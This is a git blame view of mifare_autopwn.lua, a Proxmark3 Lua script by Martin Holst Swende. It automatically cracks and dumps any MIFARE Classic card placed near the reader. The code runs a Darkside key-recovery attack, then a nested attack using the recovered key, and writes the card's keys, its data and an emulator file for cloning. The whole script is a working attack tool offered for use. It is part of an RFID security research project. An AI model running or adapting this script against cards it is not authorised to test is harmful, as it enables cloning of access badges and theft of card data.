]> git.zerfleddert.de Git - proxmark3-svn/blame_incremental - client/scripts/mifare_autopwn.lua
'hf iclass chk' part3 (#525)
[proxmark3-svn] / client / scripts / mifare_autopwn.lua
... / ...
CommitLineData
1local getopt = require('getopt')
2local reader = require('read14a')
3local cmds = require('commands')
4
5example = "script run mifare_autopwn"
6author = "Martin Holst Swende"
7
8
9desc =
10[[
11This is a script which automates cracking and dumping mifare classic cards. It sets itself into
12'listening'-mode, after which it cracks and dumps any mifare classic card that you
13place by the device.
14
15Arguments:
16 -d debug logging on
17 -h this help
18
19Output files from this operation:
20 <uid>.eml - emulator file
21 <uid>.html - html file containing card data
22 dumpkeys.bin - keys are dumped here. OBS! This file is volatile, as other commands overwrite it sometimes.
23 dumpdata.bin - card data in binary form. OBS! This file is volatile, as other commands (hf mf dump) overwrite it.
24
25]]
26
27-------------------------------
28-- Some utilities
29-------------------------------
30local DEBUG = false
31---
32-- A debug printout-function
33function dbg(args)
34 if DEBUG then
35 print(":: ", args)
36 end
37end
38---
39-- This is only meant to be used when errors occur
40function oops(err)
41 print("ERROR: ",err)
42 return nil,err
43end
44
45---
46-- Usage help
47function help()
48 print(desc)
49 print("Example usage")
50 print(example)
51end
52
53---
54-- Waits for a mifare card to be placed within the vicinity of the reader.
55-- @return if successfull: an table containing card info
56-- @return if unsuccessfull : nil, error
57function wait_for_mifare()
58 while not core.ukbhit() do
59 res, err = reader.read1443a(false, true)
60 if res then return res end
61 -- err means that there was no response from card
62 end
63 return nil, "Aborted by user"
64end
65
66function nested(key,sak)
67 local typ = 1
68 if 0x18 == sak then --NXP MIFARE Classic 4k | Plus 4k
69 typ = 4
70 elseif 0x08 == sak then -- NXP MIFARE CLASSIC 1k | Plus 2k
71 typ= 1
72 elseif 0x09 == sak then -- NXP MIFARE Mini 0.3k
73 typ = 0
74 elseif 0x10 == sak then-- "NXP MIFARE Plus 2k"
75 typ = 2
76 elseif 0x01 == sak then-- "NXP MIFARE TNP3xxx 1K"
77 typ = 1
78 else
79 print("I don't know how many sectors there are on this type of card, defaulting to 16")
80 end
81 local cmd = string.format("hf mf nested %d 0 A %s d",typ,key)
82 core.console(cmd)
83end
84
85function dump(uid)
86 core.console("hf mf dump")
87 -- Save the global args, those are *our* arguments
88 local myargs = args
89 -- Set the arguments for htmldump script
90 args =("-o %s.html"):format(uid)
91 -- call it
92 require('../scripts/htmldump')
93
94 args =""
95 -- dump to emulator
96 require('../scripts/dumptoemul')
97 -- Set back args. Not that it's used, just for the karma...
98 args = myargs
99end
100
101---
102-- The main entry point
103function main(args)
104
105
106 local verbose, exit,res,uid,err,_,sak
107 local seen_uids = {}
108
109 -- Read the parameters
110 for o, a in getopt.getopt(args, 'hd') do
111 if o == "h" then help() return end
112 if o == "d" then DEBUG = true end
113 end
114
115 while not exit do
116 res, err = wait_for_mifare()
117 if err then return oops(err) end
118 -- Seen already?
119 uid = res.uid
120 sak = res.sak
121 if not seen_uids[uid] then
122 -- Store it
123 seen_uids[uid] = uid
124 print("Card found, commencing crack", uid)
125 -- Crack it
126 local key, cnt
127 err, res = core.mfDarkside()
128 if err == -1 then return oops("Button pressed. Aborted.")
129 elseif err == -2 then return oops("Card is not vulnerable to Darkside attack (doesn't send NACK on authentication requests).")
130 elseif err == -3 then return oops("Card is not vulnerable to Darkside attack (its random number generator is not predictable).")
131 elseif err == -4 then return oops([[
132Card is not vulnerable to Darkside attack (its random number generator seems to be based on the wellknown
133generating polynomial with 16 effective bits only, but shows unexpected behaviour.]])
134 elseif err == -5 then return oops("Aborted via keyboard.")
135 end
136 -- The key is actually 8 bytes, so a
137 -- 6-byte key is sent as 00XXXXXX
138 -- This means we unpack it as first
139 -- two bytes, then six bytes actual key data
140 -- We can discard first and second return values
141 _,_,key = bin.unpack("H2H6",res)
142 print("Key ", key)
143
144 -- Use nested attack
145 nested(key,sak)
146 -- Dump info
147 dump(uid)
148 end
149 end
150end
151
152-- Call the main
153main(args)
Impressum, Datenschutz